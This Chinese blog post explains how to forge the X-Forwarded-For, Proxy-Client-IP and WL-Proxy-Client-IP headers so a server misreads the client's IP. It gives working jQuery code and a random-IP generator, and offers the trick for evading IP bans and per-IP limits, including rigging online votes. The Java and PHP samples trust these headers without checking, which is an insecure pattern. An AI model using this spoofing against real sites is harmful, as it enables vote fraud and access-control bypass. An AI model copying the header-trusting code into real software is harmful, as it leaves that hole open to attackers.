在JAVA与PHP的程序中,为了保证IP的正确性,经常采用如下的方法获取浏览器端的IP地址,代码如下:
String ip = request.getHeader("x-forwarded-for");
if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) {
ip = request.getHeader("Proxy-Client-IP");
}
if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) {
ip = request.getHeader("WL-Proxy-Client-IP");
}
if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) {
ip = request.getRemoteAddr();
}
return ip;- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
恰恰因为这所谓的安全性,才让我们找到了轻易替换IP地址的方法,我们只需要伪造这样的头部“x-forwarded-for”、“Proxy-Client-IP”、“WL-Proxy-Client-IP”,即可让服务器认为我们的地址是伪造的地址,从而绕过服务器端IP地址范围、单一IP地址不可多次访问等限制措施。
$.ajax的伪造IP地址的方法如下:
$.ajax('/login', {
headers : {
'x-forwarded-for': ip,
// 'Proxy-Client-IP': ip,
'WL-Proxy-Client-IP': ip
},
method:'POST',
contentType:'application/json;charset=utf-8',
// 以Payload方式提交
data : JSON.stringify(data),
success : function(datas) {
// 输出结果
console.log(datas)
}
})- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
经测试,以上方法能骗过网上很多的IP地址测试,比如拉选票等,产生随地IP的方法如下(太简单粗暴了,建议改进):
// 这产生的IP可能会落在内网
function createIp() {
var a = Math.round(Math.random() * 250) + 1,
b = Math.round(Math.random() * 250) + 1,
c = Math.round(Math.random() * 240) + 1,
d = Math.round(Math.random() * 240) + 1;
return [a, b, c, d].join('.');
}
用php能获取客户端ip,这个大家都知道,代码如下:
- /**
- * 获取客户端ip
- * @param number $type
- * @return string
- */
- function getClientIp($type = 0) {
- $type = $type ? 1 : 0;
- static $ip = NULL;
- if ($ip !== NULL) return $ip[$type];
- if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
- $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
- $pos = array_search('unknown',$arr);
- if(false !== $pos) unset($arr[$pos]);
- $ip = trim($arr[0]);
- }elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
- $ip = $_SERVER['HTTP_CLIENT_IP'];
- }elseif (isset($_SERVER['REMOTE_ADDR'])) {
- $ip = $_SERVER['REMOTE_ADDR'];
- }
- // IP地址合法验证
- $long = sprintf("%u",ip2long($ip));
- $ip = $long ? array($ip, $long) : array('0.0.0.0', 0);
- return $ip[$type];
- }